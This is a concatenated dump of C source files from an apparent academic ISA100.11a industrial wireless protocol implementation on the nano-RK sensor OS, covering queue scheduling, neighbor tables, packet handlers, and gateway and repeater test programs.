if (isaQueue[i].usedSlot == true && isaQueue[i].transmitPending == true && isaQueue[i].neighbor == neighbor){
if (found == false){
found = true;
priority = isaQueue[i].priority;
tempIndex = &isaQueue[i];
time.nano_secs = isaQueue[i].time.nano_secs;
time.secs = isaQueue[i].time.secs;
}
// if the priority is greater or ( priority is the same and ( seconds is less or nanosecs is less))
if (found == true && ( priority < isaQueue[i].priority || ( (priority == isaQueue[i].priority) && ( time.secs > isaQueue[i].time.secs || (time.secs == isaQueue[i].time.secs && time.nano_secs > isaQueue[i].time.nano_secs ))))){
priority = isaQueue[i].priority;
tempIndex = &isaQueue[i];
time.nano_secs = isaQueue[i].time.nano_secs;
time.secs = isaQueue[i].time.secs;
}
}
}
if (found == false) {
return NULL;
}
return tempIndex;
}
else if (graphType == 1 || graphType == 2){ //this link is only for graph routing or this link preferres graph over direct neighbor
//get the graph from the link
if (link->graphPtr == NULL || link->graphPtr->index == 0) { //if the graph pointer is null and the graph type is 2, then check for neighbor, else return NULL
if (graphType==2)goto DIRECT_NEIGHBOR;
return NULL;
}
for (i = 0; i < TRANSMIT_QUEUE_MAX_SIZE; i++){
if (isaQueue[i].usedSlot == true && isaQueue[i].transmitPending == true ){
DLMO_DROUT * dRout = &isaQueue[i].tx_buf[DROUT_INDEX];
if (dRout->GraphId!=0 && dRout->GraphId == link->graphPtr->index)//If the GraphId matches (graphId is 8 bits while index is 16 bits)
{//first time to be transmitted and top preference neighbor for is on this link or second time and second pref or third time and third pref
if (isLinkNeigborApplicable(&isaQueue[i], link))
{
if (found == false){
found = true;
priority = isaQueue[i].priority;
tempIndex = &isaQueue[i];
time.nano_secs = isaQueue[i].time.nano_secs;
time.secs = isaQueue[i].time.secs;
}
// if the priority is greater or ( priority is the same and ( seconds is less or nanosecs is less))
if (found == true && ( priority < isaQueue[i].priority || ( (priority == isaQueue[i].priority) && ( time.secs > isaQueue[i].time.secs || (time.secs == isaQueue[i].time.secs && time.nano_secs > isaQueue[i].time.nano_secs ))))){
priority = isaQueue[i].priority;
tempIndex = &isaQueue[i];
time.nano_secs = isaQueue[i].time.nano_secs;
time.secs = isaQueue[i].time.secs;
}
}
}
}
}
if (found == false) {//if no graph to use, then we can check for direct neighbor, if type is 2
if (graphType == 2) goto DIRECT_NEIGHBOR; //we did not find a graph , so now we check for direct_neighbor
return NULL;
}
return tempIndex;
}
}
//*********************************************************************************************************
void isaFreePacket(ISA_QUEUE *entry){
//Write 0 into the queue payload
entry->usedSlot = false;
entry->transmitPending = false;;
entry->slot_callback = NULL;
isaTxQueueSize--;
}
//****************** Functions for dlmo.Candidate******************************
/*
* The protocol states that the system manager may ask the device to clear its
* entire candidate table. Individual candidates are never removed
*/
void clearCandidateTable(){
uint8_t i;
dlmoCandidate.n=0;
for (i=0; i< DLMO_CANDIDATE_MAX_SIZE ; i++){
dlmoCandidate.candidate[i].neighbor = 0; //setting to zero indicates that no neighbor is present
}
}
/*
* This function adds a neighbor in the candidate table
*/
int8_t addCandidate(uint16_t candidate){
uint8_t i;
for (i=0; i<dlmoCandidate.n; i++){
if (dlmoCandidate.candidate[i].neighbor == candidate){
// printf ("Neighbor: %d already present", candidate);
return ISA_SUCCESS;
}
}
if (dlmoCandidate.n >= DLMO_CANDIDATE_MAX_SIZE) {
setIsaError(CANDIDATE_CAPACITY_ERROR);
return ISA_ERROR ;//we have reached max size
}
dlmoCandidate.candidate[dlmoCandidate.n].neighbor = candidate;
dlmoCandidate.n++;
printf ("Added %d to Candidate table at %d\r\n", candidate,dlmoCandidate.n-1 );
return ISA_SUCCESS;
}
bool isDiscoveryAlertDue(){
nrk_time_t currentTime;
nrk_time_get(¤tTime);
if (currentTime.secs - lastSentTime.secs > 60) return true;
else return false;
}
void updateLastSentTime(){
nrk_time_get(&lastSentTime);
}
int8_t sendAdv (){
uint8_t length;
// n + n * number of neighbors
length = 1 + dlmoCandidate.n * sizeof(CANDIDATE);
MESSAGE *message;
message = &nbr_buf[PKT_DATA_START];
message->type = NEIGHBOR_TABLE_REPORT;
memcpy(&message->data, &dlmoCandidate, length);
nbr_buf[DEST_INDEX] = isa_clk_src_id;
nbr_buf[SRC_INDEX] = dmo.dlAddress;
//length of dlmo.candidate + PKT_DATA_START + message-> type (1)
length = length + PKT_DATA_START + 1;
return enQueue(isa_clk_src_id, 0, length, nbr_buf, NULL);
}
/*
* This function is called to flush candidate table
*/
void flushCandidateEntries()
{
for (uint8_t i = 0; i < dlmoCandidate.n ; i++ ){
dlmoCandidate.candidate[i].neighbor = 0;
dlmoCandidate.candidate[i].rsqi = 0;
dlmoCandidate.candidate[i].rssi = 0;
}
dlmoCandidate.n=0;
}
<file_sep>/ISA100.11a-master/ISA100_11a/backup_azi/nano-RK-well-sync/projects/SAMPL/pkt_handlers/.svn/text-base/route_pkt.c.svn-base
#include <globals.h>
#include <nrk.h>
#include <nrk_error.h>
#include <../include/sampl.h>
#include <route_pkt.h>
#include <ack_pkt.h>
#include <route_table.h>
int8_t route_generate(SAMPL_UPSTREAM_PKT_T *pkt,SAMPL_DOWNSTREAM_PKT_T *ds_pkt )
{
ACK_PKT_T p;
ROUTE_PKT_T r;
uint8_t num_pkts,i,selected;
selected=0;
num_pkts=ds_pkt->payload[0];
for(i=0; i<num_pkts; i++ )
{
route_pkt_get(&r, ds_pkt->payload, i);
if(r.mac_addr==my_mac)
{
selected=1;
route_table_set(r.dst_mac, r.next_hop_mac, r.value );
}
}
if(selected)
{
// build ACK reply packet
p.mac_addr=my_mac;
pkt->payload_len = ping_pkt_add( &p, pkt->payload,0);
pkt->num_msgs=1;
pkt->pkt_type=ACK_PKT;
} else
{
pkt->pkt_type = EMPTY_PKT;
pkt->num_msgs = 0;
}
return NRK_OK;
}
void route_pkt_get( ROUTE_PKT_T *p, uint8_t *buf, uint8_t index )
{
// 1 byte offset for number of messages
p->mac_addr=buf[1+index*ROUTE_PKT_SIZE];
p->dst_mac=buf[1+index*ROUTE_PKT_SIZE+1];
p->next_hop_mac=buf[1+index*ROUTE_PKT_SIZE+2];
p->value=buf[1+index*ROUTE_PKT_SIZE+3];
}
<file_sep>/ISA100.11a-master/ISA100_11a/11-2/current/nano-RK-well-sync/projects/SAMPL/pkt_handlers/.svn/text-base/trace.c.svn-base
#include <globals.h>
#include <nrk.h>
#include <nrk_error.h>
#include <../include/sampl.h>
#include <trace.h>
int8_t trace_generate(SAMPL_UPSTREAM_PKT_T *pkt, SAMPL_DOWNSTREAM_PKT_T *ds_pkt)
{
TRACE_PKT_T p;
p.mac_addr=my_mac;
//p.parent_mac=ds_pkt->last_hop_mac;
p.parent_mac=route_table_get(GATEWAY_MAC);
p.ds_rssi=ds_pkt->rssi;
p.us_rssi=255;
pkt->payload_len = trace_pkt_add( &p, pkt->payload,0);
pkt->num_msgs=1;
return NRK_OK;
}
int8_t trace_aggregate(SAMPL_UPSTREAM_PKT_T *in, SAMPL_UPSTREAM_PKT_T *out)
{
uint8_t len,i,j,k,dup;
TRACE_PKT_T p1, p2;
// if(in->next_hop_dst_mac!=my_mac ) nrk_kprintf( PSTR( "aggregating bad packet!\r\n" ));
for(i=0; i<in->num_msgs; i++ )
{
dup=0;
// get next ping packet to compare against current outgoing list
trace_pkt_get( &p1, in->payload, i );
for(k=0; k<out->num_msgs; k++ )
{
// get packet from outgoing list and compare against incomming packet
trace_pkt_get( &p2, out->payload, k );
if(p1.mac_addr==p2.mac_addr ) dup=1;
}
if(dup==0)
{
if(p1.parent_mac==my_mac)
p1.us_rssi=in->rssi;
// if packet is unique, add to outgoing packet
out->payload_len=trace_pkt_add( &p1, out->payload, out->num_msgs );
out->num_msgs++;
}
}
return NRK_OK;
}
void trace_pkt_get( TRACE_PKT_T *p, uint8_t *buf, uint8_t index )
{
p->mac_addr=buf[index*TRACE_PKT_SIZE];
p->parent_mac=buf[index*TRACE_PKT_SIZE+1];
p->ds_rssi=buf[index*TRACE_PKT_SIZE+2];
p->us_rssi=buf[index*TRACE_PKT_SIZE+3];
}
uint8_t trace_pkt_add( TRACE_PKT_T *p, uint8_t *buf, uint8_t index )
{
buf[index*TRACE_PKT_SIZE]= p->mac_addr;
buf[index*TRACE_PKT_SIZE+1]= p->parent_mac;
buf[index*TRACE_PKT_SIZE+2]= p->ds_rssi;
buf[index*TRACE_PKT_SIZE+3]= p->us_rssi;
return ((index+1)*TRACE_PKT_SIZE);
}
<file_sep>/ISA100.11a-master/ISA100_11a/code/current/nano-RK-well-sync/tools/SLIPstream/SLIPstream-client/converter.c
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
char* bintochar(int c);
static char binarr[8];
int main (int argc, char *argv[])
{
FILE *rawFile;
int ch;
FILE *dataFile;
int cnt=0;
int i=0;
char *t;
char fileName[10];
char outputName[10];
if (argc != 3) {
printf ("Please input file name\r\n");
exit (1);
}
strcpy(fileName,argv[1]);
strcpy(outputName,argv[2]);
strcat(outputName,"out.txt");
rawFile = fopen(fileName,"r");
dataFile = fopen(outputName,"w");
while((ch=fgetc(rawFile))!=EOF){
//convert and save to a new file
//printf("ch :%d\r\n",ch);
t=bintochar(ch);
//for(i=0;i<8;i++){
//printf("%d",t[i]);
fprintf(dataFile,"%s\n",t);
//printf("\r\n");
//fprintf(dataFile,"%c",ch);
}
fclose(rawFile);
fclose(dataFile);
}
char* bintochar(int c)
{
int i;
for(i=7;i>=0;i--)
{
binarr[i]=c%2+'0';
//printf("%d",binarr[i]);
c=c/2;
}
return binarr;
}
<file_sep>/ISA100.11a-master/ISA100_11a/code/backup/isa_noresync_without_write_file/gateway/.svn/text-base/main.c.svn-base
#include <nrk.h>
#include <include.h>
#include <ulib.h>
#include <stdio.h>
#include <avr/sleep.h>
#include <hal.h>
#include <isa.h>
#include <nrk_error.h>
#include <slip.h>
//#include <sys/time.h>
#define MY_CHANNEL 19
#define MY_ID 0 //change
#define MY_TX_SLOT 0
#define NUM_OF_TEST_SET 16
#define MAX_SLIP_BUF 17
#define NUM_OF_NODES 3
//#define JOIN_TX_SLOT_START 22
//#define MY_RX_SLOT 15
//#define MY_RX_SLOT 2// change for test
NRK_STK Stack1[NRK_APP_STACKSIZE];
nrk_task_type TaskOne;
void Task1(void);
NRK_STK Stack2[NRK_APP_STACKSIZE];
nrk_task_type TaskTwo;
void Task2 (void);
void nrk_create_taskset();
void packet_measurement_better(uint8_t * local_rx_buf);
/*Buffers*/
uint8_t tx_buf[RF_MAX_PAYLOAD_SIZE];
uint8_t rx_buf[RF_MAX_PAYLOAD_SIZE];
uint8_t slip_tx_buf[MAX_SLIP_BUF];
uint8_t slip_rx_buf[MAX_SLIP_BUF];
/*packet evaluation related*/
uint8_t pkt_measure[NUM_OF_NODES][NUM_OF_TEST_SET];
uint8_t sendFlag;
uint8_t frame_cnt[NUM_OF_NODES]; //add 1 every 8 packets
uint8_t pkt_cnt[NUM_OF_NODES];
uint8_t current_pkt_index[NUM_OF_NODES];
uint8_t received_pkt_index[NUM_OF_NODES];
uint8_t current_node;
uint8_t send_node;
/* signal related declaration */
int8_t pkt_record_done_signal;
int8_t pkt_record_check()
{
return sendFlag;
}
int8_t wait_until_record_full()
{
nrk_signal_register(pkt_record_done_signal);
if (pkt_record_check() != 0)
return NRK_OK;
nrk_event_wait (SIG(pkt_record_done_signal));
return NRK_OK;
}
int main ()
{
nrk_setup_ports();
nrk_setup_uart(UART_BAUDRATE_115K2);
nrk_kprintf( PSTR("Starting up...\r\n") );
nrk_init();
nrk_led_clr(0);
nrk_led_clr(1);
nrk_led_clr(2);
nrk_led_clr(3);
nrk_time_set(0,0);
isa_task_config();
nrk_create_taskset ();
nrk_start();
return 0;
}
void Task1()
{
uint8_t j, i;
uint8_t length,slot,len;
uint8_t *local_rx_buf;
//uint32_t Score = 0;
int8_t rssi;
uint8_t cnt=0;
//char c = -1;
nrk_sig_t uart_rx_signal;
uint8_t finished = 0;
printf( "Task1 PID=%d\r\n",nrk_get_pid());
nrk_led_set(RED_LED);
nrk_led_set(BLUE_LED);
isa_set_channel_pattern(1); // must before isa_init
//isa_set_channel_pattern(3);
isa_init (ISA_GATEWAY, MY_ID, MY_ID);//change
isa_set_schedule(ISA_GATEWAY, MY_ID);
isa_set_channel(MY_CHANNEL);
//configAdvDAUX(1, 0, 25, 1, NULL, NULL, NULL, 2, NULL, NULL, NULL);
isa_start();
isa_rx_pkt_set_buffer(rx_buf, RF_MAX_PAYLOAD_SIZE);
//slip_init (stdin, stdout, 0, 0);
//while (slip_started () != 1) nrk_wait_until_next_period ();
config_child_list(1);
config_child_list(2);
while(!isa_ready()) nrk_wait_until_next_period();
printf("isa start!\n\r");
pkt_record_done_signal=nrk_signal_create();
if(pkt_record_done_signal==NRK_ERROR){
nrk_kprintf(PSTR("ERROR: creating packet record signal failed\r\n"));
nrk_kernel_error_add(NRK_SIGNAL_CREATE_ERROR,nrk_cur_task_TCB->task_ID);
return NRK_ERROR;
}
while(1){
nrk_gpio_set(NRK_DEBUG_3);
if( isa_rx_pkt_check()!=0 ) {
//printf("message is received.\n\r");
local_rx_buf=isa_rx_pkt_get(&length, &rssi);
//printf("RXLEN:%d\r\n",length);
//for(i=PKT_DATA_START; i<length-1; i++ )
//printf( "node %c,%d\r\n",local_rx_buf[PKT_DATA_START+5],local_rx_buf[PKT_DATA_START+7]);
//packet_measurement(local_rx_buf,length);
packet_measurement_better(local_rx_buf);
//printf( "%c",local_rx_buf[PKT_DATA_START]);
isa_rx_pkt_release();
//printf("\r\n");
}
if(isa_tx_pkt_check(MY_TX_SLOT)!=0){
//printf("Pending TX\r\n");
}
else{
sprintf( &tx_buf[PKT_DATA_START],"node %d,%c",MY_ID,cnt++);
length=strlen(&tx_buf[PKT_DATA_START])+PKT_DATA_START+1;
isa_tx_pkt(tx_buf,length,configDHDR(),MY_TX_SLOT);
//printf("Len:%d\r\n",length);
//printf("Hello world is sent.\n\r");
}
nrk_gpio_clr(NRK_DEBUG_3);
isa_wait_until_rx_or_tx ();
}
}
void Task2 ()
{
uint8_t len,i;
uint8_t zero_killer=0xaa;
slip_init (stdin, stdout, 0, 0);
wait_until_record_full(); //wait for first batch of packets
while (1) {
//nrk_led_set (ORANGE_LED);
//sprintf (slip_tx_buf, pkt_measure);
//if(sendFlag){
//printf("")
nrk_gpio_set(NRK_DEBUG_1);
//printf("CN:%d\r\n",send_node);
slip_tx_buf[0]=send_node+1; // get rid of '\0'
for(uint8_t i=0;i<NUM_OF_TEST_SET;i++){
slip_tx_buf[i+1]=pkt_measure[send_node][i] ^ zero_killer; //get rid of '\0'
}
//slip_tx_buf[i]=0; // add '\0' at the end
len = strlen (slip_tx_buf);
//printf("%d\r\n",len);
slip_tx (slip_tx_buf, len);
sendFlag=0;
for(i=0;i<NUM_OF_TEST_SET;i++){
pkt_measure[send_node][i]=0;
}
printf("KO,%d\r\n",send_node);
//nrk_wait_until_next_period ();
nrk_gpio_clr(NRK_DEBUG_1);
//}
wait_until_record_full();
}
}
void
nrk_create_taskset()
{
TaskOne.task = Task1;
TaskOne.Ptos = (void *) &Stack1[NRK_APP_STACKSIZE-1];
TaskOne.Pbos = (void *) &Stack1[0];
TaskOne.prio = 2;
TaskOne.FirstActivation = TRUE;
TaskOne.Type = BASIC_TASK;
TaskOne.SchType = PREEMPTIVE;
TaskOne.period.secs = 0;
TaskOne.period.nano_secs = 500*NANOS_PER_MS;
TaskOne.cpu_reserve.secs = 0;
TaskOne.cpu_reserve.nano_secs = 500*NANOS_PER_MS;
TaskOne.offset.secs = 0;
TaskOne.offset.nano_secs= 60*NANOS_PER_MS;
nrk_activate_task (&TaskOne);
TaskTwo.task = Task2;
nrk_task_set_stk( &TaskTwo, Stack2, NRK_APP_STACKSIZE);
TaskTwo.prio = 3;
TaskTwo.FirstActivation = TRUE;
TaskTwo.Type = BASIC_TASK;
TaskTwo.SchType = PREEMPTIVE;
TaskTwo.period.secs = 20;
TaskTwo.period.nano_secs = 0;
TaskTwo.cpu_reserve.secs = 0;
TaskTwo.cpu_reserve.nano_secs = 0;
TaskTwo.offset.secs = 0;
TaskTwo.offset.nano_secs = 100*NANOS_PER_MS;
nrk_activate_task (&TaskTwo);
nrk_kprintf( PSTR("Create Done\r\n") );
}
void packet_measurement_better(uint8_t * local_rx_buf)
{
uint8_t i,length;
uint8_t next_pkt_offset;
uint8_t temp;
if(local_rx_buf[PKT_DATA_START]=='n'){
current_node = local_rx_buf[PKT_DATA_START+5]-'0'; // node number
received_pkt_index[current_node] = local_rx_buf[PKT_DATA_START+7];
next_pkt_offset = received_pkt_index[current_node]-current_pkt_index[current_node]; // packet index difference
//printf("%d,%d\r\n",next_pkt_offset,current_node);
//if(next_pkt_offset!=1){
//printf("%d,%d,%d,%d,%d\r\n", local_rx_buf[PKT_DATA_START+7],current_pkt_index[current_node],next_pkt_offset,current_node,isa_get_channel());
if(next_pkt_offset>=20){
printf("HUGE LOSS\r\n");
printf("%d,%d,%d,%d,%d\r\n", local_rx_buf[PKT_DATA_START+7],current_pkt_index[current_node],next_pkt_offset,current_node,isa_get_channel());
}
//}
current_pkt_index[current_node] = local_rx_buf[PKT_DATA_START+7]; // update current pakcet index
pkt_cnt[current_node] += next_pkt_offset; // add the number of packet been measured
temp = current_pkt_index[current_node] % 8; // use 1 byte to record 8 packets
//printf("%d,%d,%d\r\n",temp,frame_cnt[0],pkt_cnt[0]);
if(pkt_cnt[current_node]>=8){
frame_cnt[current_node]+=pkt_cnt[current_node]/8;
pkt_cnt[current_node]=temp;
//printf("current frame cnt: %d\r\n", frame_cnt[current_node]);
}
if(frame_cnt[current_node]>=NUM_OF_TEST_SET){
/*for(i=0;i<NUM_OF_TEST_SET;i++){
printf("pkt: %x\r\n",pkt_measure[current_node][i]);
}*/
//printf("KO %d\r\n",current_node);
// reboot buffer for further test
frame_cnt[current_node]=0;
sendFlag=1;
send_node=current_node;
nrk_event_signal (pkt_record_done_signal);
nrk_spin_wait_us(3000);
/*for(i=0;i<NUM_OF_TEST_SET;i++){
pkt_measure[current_node][i]=0;
}*/
}
//printf("%d,%d,%d\r\n",temp,frame_cnt[1],pkt_cnt[1]);
pkt_measure[current_node][frame_cnt[current_node]] |= ((uint8_t) 1) << temp;
}
}
<file_sep>/ISA100.11a-master/ISA100_11a/backup_azi/nano-RK-well-sync/src/net/isa/isa_error.c
#include <isa_error.h>
// This uint8_t will store the latest error
static uint8_t isaError;
//********************Local function definitions***********************************
void setIsaError(uint8_t);
uint8_t getIsaError ();
void printIsaError();
//***********************************************************************************
void setIsaError(uint8_t value)
{
isaError = value;
}
uint8_t getIsaError ()
{
return isaError;
}
void printIsaError()
{
switch(isaError)
{
case LINK_CAPACITY_ERROR :
printf ("ISA_ERROR : LINK_CAPACITY_ERROR \n\r" );
break;
case NEIGHBOR_CAPACITY_ERROR :
printf ("ISA_ERROR : NEIGHBOR_CAPACITY_ERROR\n\r" );
break;
case TRANSMIT_QUEUE_CAPACITY_ERROR :
printf ("ISA_ERROR : TRANSMIT_QUEUE_CAPACITY_ERROR\n\r" );
break;
case MAX_PAYLOAD_ERROR :
printf ("ISA_ERROR : MAX_PAYLOAD_ERROR\n\r");
break;
default: printf ("Unknown ISA_ERROR");
}
}
<file_sep>/ISA100.11a-master/ISA100_11a/code/current/nano-RK-well-sync/src/net/isa/isa_error.h
#ifndef _ISA_ERROR_H
#define _ISA_ERROR_H
#include <include.h>
#include <stdio.h>
#define ISA_ERROR -1
#define ISA_SUCCESS 1
#define LINK_CAPACITY_ERROR 1
#define NEIGHBOR_CAPACITY_ERROR 2
#define TRANSMIT_QUEUE_CAPACITY_ERROR 3
#define MAX_PAYLOAD_ERROR 4
#define CANDIDATE_CAPACITY_ERROR 5
#define GRAPH_CAPACITY_ERROR 6
//********************************Extern functions*******************************************
extern void setIsaError(uint8_t);
extern uint8_t getIsaError ();
extern void printIsaError();
//*******************************************************************************************
#endif
<file_sep>/ISA100.11a-master/ISA100_11a/code/current/nano-RK-well-sync/projects/final_project/repeater/main.c
#include <nrk.h>
#include <include.h>
#include <ulib.h>
#include <stdio.h>
#include <avr/sleep.h>
#include <hal.h>
#include <isa.h>
#include <nrk_error.h>
//#include <sys/time.h>
#include <spi_matrix.h>
#define MY_CHANNEL 19
2//change
//#define MY_TX_SLOT_SYNC 2
//#define s 17
//#define MY_RX_SLOT 2
//#define MY_TX_SLOT 7
//#define MY_TX_SLOT1 8
#define MY_CLK_SRC_ID 1
NRK_STK Stack1[NRK_APP_STACKSIZE];
nrk_task_type TaskOne;
void Task1(void);
void nrk_create_taskset();
uint8_t tx_buf[RF_MAX_PAYLOAD_SIZE];
//uint8_t tx_buf2[RF_MAX_PAYLOAD_SIZE];
uint8_t rx_buf[RF_MAX_PAYLOAD_SIZE];
nrk_time_t timestart;
nrk_time_t timeend;
nrk_time_t newtime;
nrk_time_t timeout;
//*********************Making a callback function***************************************
void transmitCallback1(ISA_QUEUE *entry , bool status){
uint8_t length;
MESSAGE *message;
DLMO_DROUT *dRout;
message = &tx_buf[PKT_DATA_START];
message->type = DUMMY_PAYLOAD;
sprintf( &message->data,"node" );
length=strlen(&tx_buf[PKT_DATA_START])+PKT_DATA_START+2;
sendPacket(entry->tx_buf[DEST_INDEX],dRout->GraphId, length, tx_buf, transmitCallback1);
isaFreePacket(entry);
}
//*******************************************************************************
int main ()
{
nrk_setup_ports();
nrk_setup_uart(UART_BAUDRATE_115K2);
nrk_kprintf( PSTR("Starting up...\r\n") );
nrk_init();
nrk_led_clr(0);
nrk_led_clr(1);
nrk_led_clr(2);
nrk_led_clr(3);
nrk_time_set(0,0);
isa_task_config();
isa_set_channel_pattern(1);
isa_init (ISA_REPEATER, MY_ID, MY_CLK_SRC_ID);//change
dlmoInit(); //Initialize the Data Link Management Object
addNeighbor(1,0,0,0,true,0,0,0);
addNeighbor(5,0,0,0,false,0,0,0);
addNeighbor(6,0,0,0,false,0,0,0);
addNeighbor(7,0,0,0,false,0,0,0);
addNeighbor(8,0,0,0,false,0,0,0);
addNeighbor(9,0,0,0,false,0,0,0);
addLink(26,0,0,4,0);//ad
addLink(4,1,0,1,0);
addLink(7,5,0,1,0);
addLink(8,6,0,1,0);
addLink(9,7,0,1,0);
addLink(10,8,0,1,0);
addLink(11,9,0,1,0);
addLink(12,0,0,8,0);//receive from 5
addLink(13,0,0,8,0);//6
addLink(14,0,0,8,0);//7
addLink(15,0,0,8,0);//8
addLink(16,0,0,8,0);//9
addLink(3,0,0,8,0);//1
addLink(25,0,0,8,0);
addLink(27,0,0,8,0);//Ad
/*addLink(17,0,0,4,0);//transmit ad
addLink(40,0,0,8,0);//receive ad
addLink(18,0,0,8,0);
addLink(19,0,0,8,0);
addLink(20,0,0,8,0);
addLink(21,0,0,8,0);
addLink(41,0,0,8,0);//receive from 1
addLink(42,1,0,1,0);//transmit to 1
addGraph(1,1,4,0,0);//graph
addLink(5,4,1,1,2);//transmit to 4
addLink(6,0,0,8,0);//receive from 4*/
//addLink(26,0,0,4,0);
/* addLink(7,5,0,1,0);
addLink(8,6,0,1,0);
addLink(9,7,0,1,0);
addLink(10,8,0,1,0);
addLink(11,9,0,1,0);
addLink(12,0,0,8,0);
addLink(13,0,0,8,0);
addLink(14,0,0,8,0);
addLink(15,0,0,8,0);
addLink(16,0,0,8,0);
addLink(3,0,0,8,0);
*/
//addGraph(1,3,5,3,4);
// addLink(2,1,1,1,0);//transmitting on slot 2
// addLink(10,1,1,8,0); //receiving on slot 10
// addLink(1,1,1,8,0);//receiving on slot 1
/*
configureSlot(2, 1, TX_NO_ADV, true,0,0,0,0,0,NEIGHBOR);
configureSlot(7,5,TX_NO_ADV,false,1,1,5,0,0,GRAPH_NEIGHBOR);
// configureSlot(5, 1, TX_NO_ADV, true,0,0,0,0,0, NEIGHBOR);
//configureSlot(2,3, RX, false,0,0,0,0,0, NEIGHBOR);
//configureSlot(7,10,ADV,false,0,0,0,0,0, NEIGHBOR);
//configureSlot(6,3, RX, false,0,0,0,0,0, NEIGHBOR);
configureSlot(11,0, RX, false,0,0,0,0,0, NEIGHBOR);
configureSlot(8,0, RX, false,0,0,0,0,0, NEIGHBOR);
configureSlot(19,0,ADV,false,0,0,0,0,0,NEIGHBOR);
configureSlot(20,0, RX, false,0,0,0,0,0, NEIGHBOR);
configureSlot(21,0, RX, false,0,0,0,0,0, NEIGHBOR);
configureSlot(22,0, RX, false,0,0,0,0,0, NEIGHBOR);
configureSlot(23,0, RX, false,0,0,0,0,0, NEIGHBOR);
configureSlot(24,0, RX, false,0,0,0,0,0, NEIGHBOR);
*/
nrk_create_taskset ();
nrk_start();
return 0;
}
void Task1()
{
uint8_t j, i;
uint8_t length,slot;
uint8_t *local_rx_buf;
uint32_t Score = 0;
int8_t rssi;
uint8_t cnt=0;
//uint8_t tx[3]={2,15,16};
//uint8_t rx[3]={3,18,19};
//uint8_t my_tx_slot[4];
char c = -1;
nrk_sig_t uart_rx_signal;
uint8_t finished = 0;
printf( "Task1 PID=%d\r\n",nrk_get_pid());
nrk_led_set(RED_LED);
// isa_set_schedule(ISA_REPEATER, MY_CLK_SRC_ID);
// isa_set_channel(MY_CHANNEL);
isa_start();
isa_rx_pkt_set_buffer(rx_buf, RF_MAX_PAYLOAD_SIZE);
while(!isa_ready()) nrk_wait_until_next_period();
/*while(isa_join_ready()!=1) nrk_wait_until_next_period();
for(i=0;i<4;i++){ // set tx slots
if(tx_slot_from_join[i]==0)
break;
else
my_tx_slot[i]=tx_slot_from_join[i];
}
printf("MAIN_TX:%d\r\n",my_tx_slot[0]);*/
printf("isa start!\n\r");
//i=0;
while(1){
//Spit out log info
if (txCount % 1000 == 0){
printf ("Tx: %d\r\nRX: %d\r\nPL:%d", txCount,rxCount, packetsLost);
}
//nrk_gpio_toggle(NRK_DEBUG_0);
if( isa_rx_pkt_check()!=0 ) {
local_rx_buf=isa_rx_pkt_get(&length, &rssi);
//printf("length is %d, rssi is %d.\n\r",length,rssi);
//local_rx_buf[PKT_DATA_START+length-2]='\0';
//printf("RX[%d]",slot);
/*for(i=PKT_DATA_START; i<length-1; i++ )
printf( "%c",local_rx_buf[i]);*/
//printf("\r\n");
//sprintf( &tx_buf[PKT_DATA_START],"Hello Mingzhe!");
//length=strlen(&tx_buf[PKT_DATA_START])+PKT_DATA_START+1;
//isa_tx_pkt(tx_buf,length,configDHDR(),MY_TX_SLOT);
/*
length=strlen(&rx_buf[PKT_DATA_START])+PKT_DATA_START+1; //change
isa_tx_pkt(rx_buf,length,configDHDR(8),MY_TX_SLOT1);//change forward the message from recipient
*/
//printf(" Forward message is sent.\n\r");
//printf("pkt length:%d",length);
//printf("%d\r\n",cnt++);
// printf( "%c",local_rx_buf[PKT_DATA_START]);
isa_rx_pkt_release();
// printf("\r\n");
}
// if(isa_tx_pkt_check(MY_TX_SLOT)!=0){
// printf("Pending TX\r\n");
// }
// else{
/*sprintf( &tx_buf[PKT_DATA_START],local_rx_buf+PKT_DATA_START);
length=strlen(&rx_buf[PKT_DATA_START])+PKT_DATA_START+1; //change
//isa_tx_pkt(rx_buf,length,configDHDR(),my_tx_slot[0]);//change forward the message from recipient
isa_tx_pkt(rx_buf,length,configDHDR(),MY_TX_SLOT);
isa_wait_until_rx_or_tx ();*/
if (cnt ==0 ){
MESSAGE *message;
message = &tx_buf[PKT_DATA_START];
message->type = DUMMY_PAYLOAD;
sprintf( &message->data,"2");
length=strlen(&tx_buf[PKT_DATA_START])+PKT_DATA_START+2;
sendPacket(1,0, length, tx_buf, transmitCallback1);
//sendPacket(5,0, length, tx_buf, transmitCallback1);
//sendPacket(6, length, tx_buf, transmitCallback1);
cnt++;
}
/*sprintf( &tx_buf2[PKT_DATA_START],"Hello from slot 2!");
length=strlen(&tx_buf2[PKT_DATA_START])+PKT_DATA_START+1;
isa_tx_pkt(tx_buf2,length,configDHDR(),2);
isa_wait_until_rx_or_tx ();*/
setMatrix();
nrk_wait_until_next_period();
// }
// nrk_terminate_task();
// isa_wait_until_rx_or_tx ();
// putchar('\n');
// putchar('\r');
}
}
void
nrk_create_taskset()
{
TaskOne.task = Task1;
TaskOne.Ptos = (void *) &Stack1[NRK_APP_STACKSIZE-1];
TaskOne.Pbos = (void *) &Stack1[0];
TaskOne.prio = 2;
TaskOne.FirstActivation = TRUE;
TaskOne.Type = BASIC_TASK;
TaskOne.SchType = PREEMPTIVE;
TaskOne.period.secs = 0;
TaskOne.period.nano_secs = 10*NANOS_PER_MS;
TaskOne.cpu_reserve.secs = 0;
TaskOne.cpu_reserve.nano_secs = 20*NANOS_PER_MS;
TaskOne.offset.secs = 0;
TaskOne.offset.nano_secs= 50*NANOS_PER_MS;
nrk_activate_task (&TaskOne);
nrk_kprintf( PSTR("Create Done\r\n") );
}
<file_sep>/ISA100.11a-master/ISA100_11a/backup_azi/code/current/nano-RK-well-sync/projects/lab2/master/.svn/text-base/main.c.svn-base
#include <nrk.h>
#include <include.h>
#include <ulib.h>
#include <stdio.h>
#include <avr/sleep.h>
#include <hal.h>
#include <rt_link.h>
#include <nrk_error.h>
//#include <sys/time.h>
// Change this to your group channel
#define MY_CHANNEL 13
#define MAX_MOLES 3 //for five nodes it should be 5
#define MY_TX_SLOT 0
#define MOLE_1_RX 2
#define MOLE_2_RX 4
#define MOLE_3_RX 6
#define MOLE_4_RX 8
#define MOLE_5_RX 10
#define ROUNDS 50
#define MOLE_INIT_STATUS 0x07 //for five nodes it should be 0x1f
NRK_STK Stack1[NRK_APP_STACKSIZE];
nrk_task_type TaskOne;
void Task1(void);
void nrk_create_taskset();
uint8_t tx_buf[RF_MAX_PAYLOAD_SIZE];
uint8_t rx_buf[RF_MAX_PAYLOAD_SIZE];
nrk_time_t timestart;
nrk_time_t timeend;
nrk_time_t newtime;
nrk_time_t timeout;
int
main ()
{
